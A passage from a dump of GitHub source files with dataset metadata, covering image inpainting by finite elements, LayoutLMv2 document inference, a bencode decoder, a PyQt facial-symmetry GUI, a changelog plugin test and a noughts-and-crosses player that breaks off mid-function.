label[i-1]:\n k += 1\n label_str[k] = label[i]\n return label_str\n\n\ndef convertLabel(label):\n norm_label = []\n num = len(label)\n k = 0\n for i in range(num):\n if i == 0:\n norm_label.append(k)\n else:\n if label[i] != label[i-1]:\n k += 1\n norm_label.append(k)\n return norm_label\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"yaoyz96/a-met","sub_path":"datasets/datareg.py","file_name":"datareg.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"34651542381","text":"import numpy as np\nfrom utils import loadImage, saveImage, showImage, discrepancyScore, makeMask\n\n#image = loadImage(\"pictures/128/005.jpeg\", greyscale=False)\n\n#mask = loadImage(\"masks/128/circles.png\")\n\n#originalimage = np.copy(image)\n\ndef isMasked(mask, x ,y):\n if mask[y][x] == 0:\n return True\n return False\n\ndef isWithinBounds(x, y, width, height):\n if 0 <= x and x < width and y <= 0 and y < height:\n return True\n return False\n\ndef FEMLaplace(_image, _mask):\n #Copy the image\n newimage = np.copy(_image)\n\n width = newimage.shape[0]\n height = newimage.shape[1]\n\n #Site indexing\n siteindex = []\n\n for y in range(0,height):\n for x in range(0,width):\n interesting = False\n \n if isMasked(_mask, x, y):\n siteindex.append((x, y))\n\n #construct stiffness matrix\n K = np.zeros((len(siteindex),len(siteindex)))\n\n a=-1/6\n b=-1/3\n c=2/3\n\n for m in range(0,len(siteindex)):\n for n in range(0, m):\n x1, y1 = siteindex[m][0], siteindex[m][1]\n x2, y2 = siteindex[n][0], siteindex[n][1]\n\n if np.abs(x1-x2) + np.abs(y1-y2) == 1:\n K[m][n] = 2*a\n\n if np.abs(x1-x2) == 1 and np.abs(y1-y2) == 1:\n K[m][n] = b \n\n K = K+K.transpose()+4*c*np.identity(len(siteindex))\n\n #Construct force vector\n f = np.zeros((len(siteindex),1))\n\n for k in range(0,len(siteindex)):\n #Find values of neighbouring Dirichlet boundary conditions\n diagonalsum = 0\n\n x,y = siteindex[k][0],siteindex[k][1]\n\n if not isMasked(_mask, x-1,y-1):\n diagonalsum += newimage[y-1][x-1]\n if not isMasked(_mask, x-1,y+1):\n diagonalsum += newimage[y+1][x-1]\n if not isMasked(_mask, x+1,y-1):\n diagonalsum += newimage[y-1][x+1]\n if not isMasked(_mask, x+1,y+1):\n diagonalsum += newimage[y+1][x+1]\n\n adjacentsum = 0\n\n if not isMasked(_mask, x,y+1):\n adjacentsum += newimage[y+1][x]\n if not isMasked(_mask, x,y-1):\n adjacentsum += newimage[y-1][x]\n if not isMasked(_mask, x+1,y):\n adjacentsum += newimage[y][x+1]\n if not isMasked(_mask, x-1,y):\n adjacentsum += newimage[y][x-1]\n\n f[k][0] = -(diagonalsum*b+adjacentsum*2*a)\n\n #Solve system for the 'displacement vector', i.e. the pixel values\n d = np.linalg.solve(K,f)\n\n for k in range(0,len(siteindex)):\n x, y = siteindex[k][0], siteindex[k][1]\n newimage[y][x] = d[k]\n\n return newimage\n\n#restoredimageR = FEMLaplace(image[:,:,0], mask)\n#restoredimageG = FEMLaplace(image[:,:,1], mask)\n#restoredimageB = FEMLaplace(image[:,:,2], mask)\n\n#restoredimage = np.dstack([restoredimageR,restoredimageG,restoredimageB])\n\n#showImage(np.concatenate([originalimage,np.dstack([mask,mask,mask]).astype(np.uint8),restoredimage],axis=1))\n\n#DSMask = makeMask(\"masks/128/circles.png\") #Need the mask site index list\n#scoreR = discrepancyScore(originalimage[:,:,0], restoredimageR, DSMask[1])\n#scoreG = discrepancyScore(originalimage[:,:,1], restoredimageG, DSMask[1])\n#scoreB = discrepancyScore(originalimage[:,:,2], restoredimageB, DSMask[1])\n\n\n#scoreTot = (scoreR + scoreG + scoreB)/3\n#print(\"Average discrepancy score = \" + str(scoreTot))\n\n\n","repo_name":"Aquila042/ImageRestoration","sub_path":"FEM.py","file_name":"FEM.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40896232121","text":"import pandas as pd\nfrom collections import Counter\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom transformers import LayoutLMv2ForTokenClassification, AdamW\nfrom transformers import LayoutLMv2Processor\nimport torch\nfrom tqdm.notebook import tqdm\nfrom os import listdir\nfrom PIL import Image\nimport json\nfrom seqeval.metrics import (\n classification_report,\n f1_score,\n precision_score,\n recall_score)\nfrom data_loader import Data_Loader\n\nreplacing_labels = {'chxh_2_en':'O','key_ngon_tro_trai_en':'O','key_ngon_tro_phai_en':'O','value_nguoi_cap':'O','key_ngon_tro_trai':'O','cnxh_1_en': 'O','chxh_1_en':'O','ignore_1_en': 'O', 'ignore_2_en':'O', 'noi_cap_1':'O', 'noi_cap_2': 'O', 'driver_license_bo_gtvt_1': 'O', 'driver_license_bo_gtvt_2': 'O', 'dau_vet_1': 'dau_vet', 'dau_vet_2': 'dau_vet', 'ignore_1': 'O', 'ignore_2': 'O', 'chxh_1': 'O', 'chxh_2': 'O', 'key_ho_ten_khac':'O', 'level_nguoi_cap_1': 'O', 'level_nguoi_cap_2': 'O', 'key_hang_cap': 'O', 'nguoi_cap': 'O', 'hang_cap': 'O','van_tay_phai':'O','van_tay_trai':'O'}\n\n\nprocessor = LayoutLMv2Processor.from_pretrained(\"microsoft/layoutlmv2-base-uncased\", revision=\"no_ocr\")\n\ndebug = pd.read_pickle('debug.pkl')\ndebug_dataset = Dataset(annotations=debug,\n image_dir='debug_image_real_3/', \n processor=processor)\ndebug_dataloader = DataLoader(debug_dataset, batch_size=1)\ndata_loader = Data_Loader(replacing_labels = replacing_labels,processor = processor)\ntrain_dataloader, val_dataloader, test_dataloader, label2id, id2label, labels, all_labels = data_loader.load_data()\n\nmodel = LayoutLMv2ForTokenClassification.from_pretrained('Best',num_labels=len(labels))\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel.to(device)\noptimizer = AdamW(model.parameters(), lr=5e-5)\n\nmodel.eval()\nimport numpy as np\n\npreds_val = None\nout_label_ids = None\n\n# put model in evaluation mode\nmodel.eval()\nFinal_pred = {}\ncount =0\nfor batch in tqdm(debug_dataloader, desc=\"Evaluating\"):\n count = count +1\n with torch.no_grad():\n input_ids = batch['input_ids'].to(device)\n bbox = batch['bbox'].to(device)\n image = batch['image'].to(device)\n attention_mask = batch['attention_mask'].to(device)\n token_type_ids = batch['token_type_ids'].to(device)\n labels = batch['labels'].to(device)\n\n # forward pass\n outputs = model(input_ids=input_ids, bbox=bbox, image=image, attention_mask=attention_mask, \n token_type_ids=token_type_ids, labels=labels)\n \n if preds_val is None:\n preds_val = outputs.logits.detach().cpu().numpy()\n out_label_ids = batch[\"labels\"].detach().cpu().numpy()\n else:\n preds_val = np.append(preds_val, outputs.logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(\n out_label_ids, batch[\"labels\"].detach().cpu().numpy(), axis=0\n )\n pred = outputs.logits.argmax(-1).squeeze().tolist()\n\n for id, label in zip(input_ids.squeeze(), pred):\n if label == 0:\n continue\n if id2label[label] in Final_pred:\n Final_pred[id2label[label]].append(processor.tokenizer.decode(id))\n else:\n Final_pred[id2label[label]] = [processor.tokenizer.decode(id)]\n if count == 1:\n break\nprint(Final_pred)\nwith open(\"sample.json\", \"w\") as outfile:\n json.dump(Final_pred, outfile,indent = 4)\n#debug_labels = [id2label[idx] for idx in preds_val]","repo_name":"MinhTu1082001/Extraction_Colab","sub_path":"Old/test_Inference.py","file_name":"test_Inference.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42318472694","text":"class Decoder(object):\n def __init__(self):\n self.readers = {\n 'i': self.read_int,\n 'd': self.read_dict,\n 'l': self.read_list,\n }\n for digit in range(10):\n self.readers[str(digit)] = self.read_str\n\n def decode(self, data):\n length, value = self.read_token(data)\n return value\n\n def read_dict(self, data):\n assert data[0] == 'd'\n pos = 1\n values = {}\n while data[pos] != 'e':\n length, key = self.read_str(data[pos:])\n pos += length\n length, value = self.read_token(data[pos:])\n pos += length\n values[key] = value\n return pos + 1, values\n\n def read_int(self, data):\n assert data[0] == 'i'\n final_pos = data.find('e')\n value = int(data[1:final_pos])\n length = final_pos + 1\n return length, value\n\n def read_list(self, data):\n assert data[0] == 'l'\n pos = 1\n values = []\n while data[pos] != 'e':\n length, value = self.read_token(data[pos:])\n pos += length\n values.append(value)\n return pos+1, values\n\n def read_str(self, data):\n sep = data.find(':')\n length = int(data[:sep])\n value = data[sep+1:sep+length+1]\n return sep+length+1, value\n\n def read_token(self, data):\n marker = data[0]\n return self.readers[marker](data)\n","repo_name":"xchewtoyx/polyglot","sub_path":"torrent/py/torrent/bencode.py","file_name":"bencode.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13886665568","text":"import sys\n# import os\n# import cv2\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMessageBox, QGraphicsPixmapItem, QGraphicsScene, QStatusBar\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.uic import loadUiType\nfrom PyQt5.QtCore import QStringListModel\nfrom symmetry_eval import *\n\nMainWindowForm, MainWindowBase = loadUiType('GUI/gui.ui')\n\n\ndef w_h_resize(img_path, w_re, h_re):\n img_path = str(img_path)\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n h, w = img.shape[0:2]\n if h < w:\n ratio = float(w / h)\n h_re = int(w_re / ratio)\n img = cv2.resize(img, (w_re, h_re))\n else:\n ratio = float(h / w)\n w_re = int(h_re / ratio)\n img = cv2.resize(img, (w_re, h_re))\n return img, w_re, h_re\n\n\nclass MainWindow(MainWindowBase, MainWindowForm):\n def __init__(self):\n # Initialization\n super(MainWindow, self).__init__()\n self.setupUi(self)\n self.setWindowTitle('Facial Symmetry Evaluation')\n self.paras = parameters()\n self.yolo_dir, self.crop_dir, self.san_dir, self.results_path = '', '', '', ''\n self.landmarks, self.landmarks_normal = [], []\n self.SI_Eyebrows, self.SI_Eyes, self.SI_Mouth = 0, 0, 0\n # StatusBar initialization\n self.statusBar = QStatusBar()\n self.statusBar.setStyleSheet('QStatusBar::item {border: none;}')\n self.setStatusBar(self.statusBar)\n self.statusBar.showMessage('Individual Project: Face symmetry evaluation')\n # Set events for buttons\n self.display_page1()\n self.pushButton_p11.clicked.connect(self.open_file) # Right Widget, Page1, 'Select File'\n self.pushButton_p12.clicked.connect(self.detect_faces) # Right Widget, Page1, 'Detext Face(s)'\n self.pushButton_p13.clicked.connect(self.display_page2) # Right Widget, Page1, 'Next'\n self.pushButton_p21.clicked.connect(self.display_page1) # Right Widget, Page2, 'Previous'\n self.pushButton_p22.clicked.connect(self.display_page3) # Right Widget, Page2, 'Start Evaluation'\n self.pushButton_p31.clicked.connect(self.display_page2) # Right Widget, Page3, 'Previous'\n self.pushButton_p32.clicked.connect(self.display_page1) # Right Widget, Page3, 'Retry'\n self.pushButton_Re.clicked.connect(self.page3_graphic_change)\n self.pushButton_BH.clicked.connect(self.page3_graphic_change)\n self.pushButton_EH.clicked.connect(self.page3_graphic_change)\n self.pushButton_EW.clicked.connect(self.page3_graphic_change)\n self.pushButton_EA.clicked.connect(self.page3_graphic_change)\n self.pushButton_MC.clicked.connect(self.page3_graphic_change)\n self.pushButton_MA.clicked.connect(self.page3_graphic_change)\n self.pushButton_MTA.clicked.connect(self.page3_graphic_change)\n self.listView.clicked.connect(self.face_list) # Right Widget, Page2, list\n\n def display_page1(self):\n self.stackedWidget.setCurrentIndex(0)\n self.label_1.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n\n def display_page2(self):\n if self.stackedWidget.currentIndex() == 0:\n if self.yolo_dir == '':\n QMessageBox.warning(self, 'Warning', 'Please select a picture and perform face detection!')\n else:\n self.stackedWidget.setCurrentIndex(1)\n self.label_1.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.yolo_dir = get_file(self.yolo_dir)\n slm = QStringListModel()\n slm.setStringList(self.yolo_dir)\n self.listView.setModel(slm)\n labeltext = f'Select 1 from {num_detect} face(s)'\n self.label_p21.setText(labeltext)\n else:\n self.stackedWidget.setCurrentIndex(1)\n self.label_1.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n\n def display_page3(self):\n self.stackedWidget.setCurrentIndex(2)\n self.label_1.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n Symmetry_Index = self.detect_landmarks()\n self.lineEdit_BH_L.setText(f'{Symmetry_Index[0]} px')\n self.lineEdit_BH_R.setText(f'{Symmetry_Index[1]} px')\n self.lineEdit_BH_D.setText(f'{Symmetry_Index[2]} px')\n self.lineEdit_EH_L.setText(f'{Symmetry_Index[3]} px')\n self.lineEdit_EH_R.setText(f'{Symmetry_Index[4]} px')\n self.lineEdit_EH_D.setText(f'{Symmetry_Index[5]} px')\n self.lineEdit_EW_L.setText(f'{Symmetry_Index[6]} px')\n self.lineEdit_EW_R.setText(f'{Symmetry_Index[7]} px')\n self.lineEdit_EW_D.setText(f'{Symmetry_Index[8]} px')\n self.lineEdit_EA_L.setText(f'{Symmetry_Index[9]} px²')\n self.lineEdit_EA_R.setText(f'{Symmetry_Index[10]} px²')\n self.lineEdit_EA_D.setText(f'{Symmetry_Index[11]} px²')\n self.lineEdit_MC_L.setText(f'{Symmetry_Index[12]} px')\n self.lineEdit_MC_R.setText(f'{Symmetry_Index[13]} px')\n self.lineEdit_MC_D.setText(f'{Symmetry_Index[14]} px')\n self.lineEdit_MA_L.setText(f'{Symmetry_Index[15]} px²')\n self.lineEdit_MA_R.setText(f'{Symmetry_Index[16]} px²')\n self.lineEdit_MA_D.setText(f'{Symmetry_Index[17]} px²')\n self.lineEdit_MTA_D.setText(f'{Symmetry_Index[18]} °')\n self.lineEdit_Eva_EB.setText(f'{Symmetry_Index[19]} %')\n self.lineEdit_Eva_E.setText(f'{Symmetry_Index[20]} %')\n self.lineEdit_Eva_M.setText(f'{Symmetry_Index[21]} %')\n labelText = 'The face seems SYMMETRICAL !'\n if Symmetry_Index[19] < 90 or Symmetry_Index[20] < 90 or Symmetry_Index[21] < 90:\n labelText = 'The face seems ASYMMETRICAL ! '\n self.label_p31.setText(labelText)\n self.page3_graphic(self.results_path)\n\n def open_file(self):\n fileName, fileType = QtWidgets.QFileDialog.getOpenFileName(self, \"Select File\", os.getcwd(),\n \"Image Files(*.jpg *.jpeg)\")\n self.lineEdit.setText(fileName)\n self.paras.image = self.lineEdit.text()\n self.page1_graphic(self.paras.image)\n\n def page1_graphic(self, img_path):\n img, w_re, h_re = w_h_resize(img_path, 655, 545)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p1.setScene(scene)\n\n def page2_graphic(self, img_path):\n img, w_re, h_re = w_h_resize(img_path, 495, 495)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p2.setScene(scene)\n\n def page3_graphic(self, img_path):\n sender = self.sender()\n clickEvent = sender.text()\n img, w_re, h_re = w_h_resize(img_path, 390, 390)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p3.setScene(scene)\n\n def page3_graphic_change(self):\n sender = self.sender()\n clickEvent = sender.text()\n if clickEvent == u'Brows Height:':\n img_path = self.results_path.split('.')[0] + '_Eyebrows.jpg'\n elif clickEvent == u'Eyes Height:':\n img_path = self.results_path.split('.')[0] + '_EyeHeight.jpg'\n elif clickEvent == u'Eyes Width:':\n img_path = self.results_path.split('.')[0] + '_EyeWidth.jpg'\n elif clickEvent == u'Eyes Area:':\n img_path = self.results_path.split('.')[0] + '_EyeArea.jpg'\n elif clickEvent == u'Mouth Corner:':\n img_path = self.results_path.split('.')[0] + '_MouthCorner.jpg'\n elif clickEvent == u'Mouth Area:':\n img_path = self.results_path.split('.')[0] + '_MouthArea.jpg'\n elif clickEvent == u'Mouth Angle:':\n img_path = self.results_path.split('.')[0] + '_MouthAngle.jpg'\n else:\n img_path = self.results_path\n img, w_re, h_re = w_h_resize(img_path, 390, 390)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p3.setScene(scene)\n\n def face_list(self, qModelIndex):\n self.page2_graphic(self.yolo_dir[qModelIndex.row()])\n self.crop_dir = self.yolo_dir[qModelIndex.row()]\n\n def detect_faces(self):\n global num_detect\n if not os.path.isfile(self.lineEdit.text()):\n QMessageBox.warning(self, 'Warning', 'Please select an image file')\n else:\n self.paras.image = self.lineEdit.text()\n self.paras.image = self.paras.image.replace('\\\\', '/').replace('\\\\\\\\', '/').replace('//', '/')\n results = yolo_detect(self.paras)\n if len(results) == 2:\n self.yolo_dir, num_detect = results[:]\n else:\n num_detect = 0\n QMessageBox.warning(self, 'Warning', 'There is no face detected, try other images please!')\n img_path = str(self.yolo_dir) + '/' + self.paras.image.split('/')[-1]\n face = 'faces' if num_detect > 1 else 'face'\n labeltext = f'{num_detect} {face} detected!'\n self.label_p11.setText(labeltext)\n self.page1_graphic(img_path)\n\n def detect_landmarks(self):\n img = cv2.imread(self.crop_dir) # read face image\n h, w = img.shape[0:2]\n h_re, w_re = int(h * 720 / h), int(w * 720 / h) # x=>640, scale y correspondingly\n img_resize = cv2.resize(img, dsize=(w_re, h_re), fx=1, fy=1,\n interpolation=cv2.INTER_LINEAR) # scale image to x=640\n cv2.imwrite(self.crop_dir, img_resize) # save scaled image for SAN\n self.san_dir, self.landmarks = SAN_detect(self.crop_dir, self.paras)\n self.results_path, self.landmarks_normal = landmark_normalize(self.san_dir, self.landmarks)\n SI_data = SI_calculate(self.results_path, self.landmarks_normal)\n return SI_data\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Exit', 'Are you sure to quit?', QMessageBox.Yes | QMessageBox.Cancel)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"GaiusC/Face_Symmetry_Evaluation","sub_path":"main_gui.py","file_name":"main_gui.py","file_ext":"py","file_size_in_byte":11367,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"393375477","text":"import sys\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom baldrick.github.github_api import FILE_CACHE\nfrom baldrick.github.github_api import RepoHandler, PullRequestHandler\nfrom baldrick.plugins.github_towncrier_changelog import process_towncrier_changelog\n\n\nCONFIG_TEMPLATE = \"\"\"\n[ tool.towncrier ]\n package = \"testbot\"\n filename = \"NEWS.rst\"\n\n[ tool.testbot ]\n[ tool.testbot.towncrier_changelog ]\nenabled=true\n\"\"\"\n\nCUSTOM_TYPE_TEMPLATE = \"\"\"\n[tool.towncrier]\n package = \"sunpy\"\n directory = \"changelog/\"\n\n [[tool.towncrier.type]]\n directory = \"doc\"\n name = \"Improved Documentation\"\n showcontent = true\n\n [[tool.towncrier.type]]\n directory = \"trivial\"\n name = \"Trivial/Internal Changes\"\n showcontent = true\n\n[ tool.testbot ]\n[ tool.testbot.towncrier_changelog ]\nenabled=true\n\"\"\"\n\n\nclass TestTowncrierPlugin:\n\n def setup_method(self, method):\n\n self.get_file_contents_mock = patch('baldrick.github.github_api.PullRequestHandler.get_file_contents')\n self.get_base_branch_mock = patch('baldrick.github.github_api.PullRequestHandler.base_branch')\n a = self.get_base_branch_mock.start()\n a.return_value = \"master\"\n self.modified_files_mock = patch('baldrick.github.github_api.PullRequestHandler.get_modified_files')\n\n self.repo_handler = RepoHandler(\"nota/repo\", \"1234\")\n self.pr_handler = PullRequestHandler(\"nota/repo\", \"1234\")\n\n self.get_file_contents = self.get_file_contents_mock.start()\n self.modified_files = self.modified_files_mock.start()\n\n FILE_CACHE.clear()\n\n def teardown_method(self, method):\n self.get_file_contents_mock.stop()\n self.modified_files_mock.stop()\n self.get_base_branch_mock.stop()\n\n @pytest.mark.xfail(\n sys.platform.startswith('win'),\n reason='process_towncrier_changelog returns failure on Windows')\n def test_changelog_present(self, app):\n\n self.get_file_contents.return_value = CONFIG_TEMPLATE\n self.modified_files.return_value = (['./testbot/newsfragments/1234.bugfix'])\n\n with app.app_context():\n messages = process_towncrier_changelog(self.pr_handler, self.repo_handler)\n\n for message in messages.values():\n assert message['conclusion'] == 'success'\n\n @pytest.mark.xfail(\n sys.platform.startswith('win'),\n reason='process_towncrier_changelog returns failure on Windows')\n def test_changelog_type_substring(self, app):\n\n self.get_file_contents.return_value = CUSTOM_TYPE_TEMPLATE\n self.modified_files.return_value = (['changelog/1234.docfix.rst'])\n\n with app.app_context():\n messages = process_towncrier_changelog(self.pr_handler, self.repo_handler)\n\n assert messages['wrong_type']['conclusion'] == 'failure'\n","repo_name":"OpenAstronomy/baldrick","sub_path":"baldrick/plugins/tests/test_github_towncrier_changelog.py","file_name":"test_github_towncrier_changelog.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"29"} +{"seq_id":"31063539517","text":"# Here we build a model to play noughts and crosses\n# Eventually we hope to do this by Reinforcement Learning, but\n# code for that does not work properly yet. Instead we have\n# coded the usual algorithm and trained a model to mimic that.\n\n# We effectively treat the board as a linear array of 9 cells.\n# Each game position is represented as an array of shape (9, 2)\n# with a 1 in position (i, 0) if there is an O in position i,\n# and a 1 in position (i, 1) if there is an X in position i.\n# Player 0 plays Os and player 1 plays Xs.\n\nfrom re import I\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines\nimport os\nfrom itertools import combinations\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\nsrc_dir = os.path.dirname(os.path.realpath(__file__))\nmodels_dir = os.path.realpath(os.path.join(src_dir,'../models'))\n\nmodel = None\n\nBATCH_SIZE = 64\nSHUFFLE_SIZE = 100\nEPOCHS = 20\n\nboard = range(9)\n\n# The array below encodes the rules which determine when a \n# player has won. For example, wins[0] has 1s in positions \n# 0, 3 and 6, indicating that a player has won if they \n# have counters in positions 0, 3 and 6.\nwins = np.array([\n [1, 0, 0, 1, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 1, 0, 0, 1],\n [1, 1, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 1, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 1, 0, 0, 0, 1],\n [0, 0, 1, 0, 1, 0, 1, 0, 0]\n])\n\n# ee[i] is the vector of length 9 with a single 1 in position i\n# eee[i, j] is the array of shape (9, 2) with a single 1 in position (i, j)\nee = np.eye(9)\neee = np.zeros([9, 2, 9, 2])\n\n\ndef make_eee():\n global eee\n for i in range(9):\n for j in range(2):\n eee[i, j, i, j] = 1\n\n\nmake_eee()\n\n# corners[i] is 1 iff position i is a corner of the board\n# edges[i] is 1 iff position i is the middle of one edge of the board\ncorners = np.array([1, 0, 1, 0, 0, 0, 1, 0, 1])\nedges = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0])\n\n# opposite[i] is the position opposite position i\nopposite = [8, 7, 6, 5, 4, 3, 2, 1, 0]\n\nempty_board = np.zeros([9, 2])\n\n\ndef add_o(pq, i): pq[i, 0] = 1\n\n\ndef add_x(pq, i): pq[i, 1] = 1\n\n# has_win(pq, 0) is True if, in the game state described by the \n# array pq, player 0 has filled a line (and so has won, if the\n# game state was reached by legal play). has_win(pq, 1) is similar.\n# has_win(pq) = has_win(pq, None) = has_win(pq, 0) or has_win(pq, 1)\ndef has_win(pq, player=None):\n w = [np.max(np.matmul(wins, pq[:, j])) >= 3 for j in [0, 1]]\n if player is None:\n return w[0] or w[1]\n else:\n return w[player]\n\n# plays(pq) is the list of positions which are empty (in the game \n# state described by the array pq), and so are available to the \n# next player.\ndef plays(pq, player=0):\n n = []\n for i in range(9):\n if pq[i, 0] == 0 and pq[i, 1] == 0:\n n.append(i)\n return n\n\n\n# near_wins(pq, i) is the list of positions at which player i could \n# play and thereby immediately win.\ndef near_wins(pq, player=0):\n n = []\n for i in range(9):\n if pq[i, 0] == 0 and pq[i, 1] == 0 and has_win(pq + eee[i, player], player):\n n.append(i)\n return n\n\n\n# forks(pq, i) is the list of positions at which player i could \n# play and thereby create two near-wins.\ndef forks(pq, player=0):\n f = []\n for i in range(9):\n if pq[i, player] == 0 and pq[i, 1-player] == 0 and \\\n len(near_wins(pq + eee[i, player], player)) > 1:\n f.append(i)\n return f\n\n\n# swap(pq) represents the same game state as pq but with the Os and Xs exchanged\ndef swap(pq):\n return np.array([[pq[i, 1-j] for j in range(2)] for i in range(9)])\n\n\n# This function expects a list moves = [moves_o, moves_x], where \n# moves_o and moves_x are disjoint lists of distinct board positions.\n# It returns the corresponding game state pq as an array of shape (9, 2)\ndef board_from_moves(moves):\n s = empty_board.copy()\n for i in [0,1]:\n for j in moves[i]:\n s += eee[j, i]\n return s\n\n\n# random_move(pq, i) returns a randomly selected legal move for\n# player i in game state pq. The return value is just an integer\n# (or None if the board is already full).\ndef random_move(pq, player=0):\n if has_win(pq) or len(plays(pq)) == 0:\n return None\n return np.random.choice(plays(pq, player))\n\n\n# suggest_move(pq, i) returns a suggested move for player i in \n# game state pq. The suggestions are optimal in the sense that \n# a win or draw is guaranteed if the suggestions are followed\n# throughout the game. The function returns None if the board \n# is already full.\ndef suggest_move(pq, player):\n if player == 0:\n pq0 = pq.copy()\n qp0 = swap(pq0)\n else:\n qp0 = pq.copy()\n pq0 = swap(qp0)\n if has_win(pq0) or len(plays(pq0)) == 0:\n return None\n n = near_wins(pq0)\n if len(n) > 0: return n[0]\n m = near_wins(qp0)\n if len(m) > 0: return m[0]\n f = forks(pq0)\n if len(f) > 0: return f[0]\n g = forks(qp0)\n if len(g) == 1: return g[0]\n for i in g:\n pq1 = pq0 + eee[i, 0]\n qp1 = swap(pq1)\n if len(near_wins(pq1)) > 0 and len(forks(qp1)) > 0:\n return i\n if pq0[4, 0] == 0 and pq0[4, 1] == 0: return 4\n for i in [0, 2, 6, 8]:\n if pq0[i, 0] == 0 and pq0[i, 1] == 0 and pq0[8-i, 1] == 1:\n return i\n for i in [0, 2, 6, 8, 1, 3, 5, 7]:\n if pq0[i, 0] == 0 and pq0[i, 1] == 0:\n return i\n return None\n\n\n# This function displays the game state pq and prompts the user\n# to enter a move for the specified player.\ndef input_move(pq, player=0):\n if player == 0:\n s = 'O'\n else:\n s = 'X'\n show_board_ascii(pq)\n prompt = 'Enter position (0-8) for next ' + s + ': '\n i = input(prompt)\n try:\n i = int(i)\n except ValueError:\n return None\n if i < 0 or i > 8:\n i = None\n return i\n\n\n# This function sets various global variables.\n# all_states is the list of all game states that could be seen \n# by player 0 in legal play (with either player 0 or player 1 \n# starting the game). It only includes the 4519 states in which \n# player 0 is required to respond; states are excluded if either \n# player has already won. \n#\n# all_states_suggestions is the corresponding list of suggested\n# moves, with one-hot encoding. In other words, if the suggestion\n# for state all_states[i] is to play in position j, then \n# all_states_suggestions[i] is the basis vector ee[j]\n#\n# all_dataset packages all_states and all_states_suggestions in\n# a tensorflow dataset (shuffled and batched)\ndef make_all_states():\n global states, all_states, all_states_suggestions, all_dataset\n all_states = []\n states = [[empty_board.copy()]]\n for i in range(1,9):\n states.append([])\n for s in states[i-1]:\n p = plays(s)\n k = 8\n while s[k, i % 2] == 0 and k >= 0: \n k = k-1\n for j in p:\n s1 = s + eee[j, i % 2]\n if j > k and not has_win(s1):\n states[i].append(s1)\n all_states += states[i]\n \n all_states_suggestions = list(map(\n lambda pq: ee[suggest_move(pq, 1)], \n all_states\n ))\n\n all_dataset = tf.data.Dataset.from_tensor_slices((all_states, all_states_suggestions))\n all_dataset = all_dataset.shuffle(SHUFFLE_SIZE).batch(BATCH_SIZE)\n\n return all_states\n\n\nmake_all_states()\n\n\n######################################################################\n# This section attempts to train a model to play noughts and \n# crosses using deep Q learning. It currently runs without errors\n# but does not learn to play even legal moves.\n#\n# In more detail, the idea is to calculate a function Q from game states\n# to vectors of length 9, with Q(pq)[i] interpreted as the expected \n# reward if player 0 plays i in state pq. Rewards are +1 for a win,\n# -1 for a loss, 0 for a draw and -5 for an illegal move. The \n# method is to train the weights to force Q to satisfy a certain \n# consistency condition.\n\ndef make_Q_model(p=20, q=20, r=0.001):\n global Q_model\n inputs = 